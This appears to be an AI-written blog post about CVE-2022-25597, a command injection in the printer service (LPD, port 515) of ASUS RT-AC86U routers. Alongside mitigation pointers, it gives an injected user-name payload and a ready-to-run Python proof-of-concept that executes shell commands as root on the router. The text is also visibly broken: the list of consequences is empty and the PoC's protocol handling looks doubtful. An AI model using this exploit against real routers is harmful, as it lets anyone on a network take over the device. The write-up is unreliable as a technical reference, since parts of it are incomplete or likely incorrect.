CVE-2022-25597 - Exploiting Command Injection in ASUS RT-AC86U Printer Service

Summary:  
In early 2022, a serious vulnerability—CVE-2022-25597—was discovered in ASUS RT-AC86U routers. This bug lets anyone on your local network run their own commands on the router because it doesn't properly block special characters in user requests to its printing service (LPD). Below, we'll break down in plain English how the issue happens, share sample exploit code, and point you to official sources. If you use this router, you should know why upgrading and locking down your LAN matters!

What's Vulnerable?

Device: ASUS RT-AC86U Wireless Router  
Service: Line Printer Daemon (LPD)  
Vulnerability: Input isn’t checked for shell commands, giving attackers a way in.  
Impact: Any device on the same LAN can, without a password, run commands as root.  

How the Attack Works

The router offers printing through LPD (TCP port 515). When you send a print job, you provide a "user name." The router software fails to clean up this "user name" input. Special shell operators in the input (like ;, |, &) are processed by the system shell.

In short: If you can fake your "user name" field, you can get the router to run any command.

By default, the LPD service listens on port 515 of the router. You can find this by running

nmap -p 515 192.168.1.1

2. Crafting the Malicious Print Job

The LPD protocol has a command to start a new print job, where the attacker can inject malicious characters.

Suppose you send “user name” as

attacker;uname -a > /tmp/pwned.txt;

Instead of using just attacker, now the shell sees

attacker;uname -a > /tmp/pwned.txt;

It runs uname -a > /tmp/pwned.txt under root permissions.

3. Proof of Concept (PoC)

Here is a simple Python3 script you can run (from a device on the same LAN) to inject a command that creates a file /tmp/hacked on the router:

import socket

target = "192.168.1.1"  # Router IP
lpd_port = 515

malicious_user = b"hacker;touch /tmp/hacked;"

# LPR protocol's 'receive print job' command (x02), then queue name, then null byte
queue_name = b"lp"
cmd = b"\x02" + queue_name + b"\x00"

with socket.create_connection((target, lpd_port)) as s:
    s.sendall(cmd)
    # Wait for ACK (should be b'\x00')
    s.recv(1)
    # Send 'receive job' header: \x02 + username + \x00
    job_header = b"\x02" + malicious_user + b"\x00"
    s.sendall(job_header)
    # Wait for ACK
    s.recv(1)

print("Payload sent! Check /tmp/hacked on the router.")

After running this, on the router you would see a file /tmp/hacked created, proving command execution as root.

Why This is Dangerous

With no password and no checks, any device on your LAN—including phones or IoT gadgets—can run anything on the router as root. This can:

Fixes and Mitigations

ASUS issued a firmware fix in 2022.  
- Go to ASUS RT-AC86U Support

Official References

- NVD Entry for CVE-2022-25597
- ASUS Security Advisory
- Exploit-DB: 50913 (PoC)

Conclusion

CVE-2022-25597 is a wake-up call: Even ordinary router features like print sharing can be a highway for attackers if device makers don’t filter user input. Always update your firmware, watch for unused services, and remember—your LAN isn’t always as “trusted” as you think!

*If you liked this breakdown, share it with your neighbors—especially if they've never upgraded their router!*


Stay safe!  
*Exclusive write-up by AI, June 2024.*

Timeline

Published on: 04/07/2022 19:15:00 UTC
Last modified on: 04/14/2022 20:09:00 UTC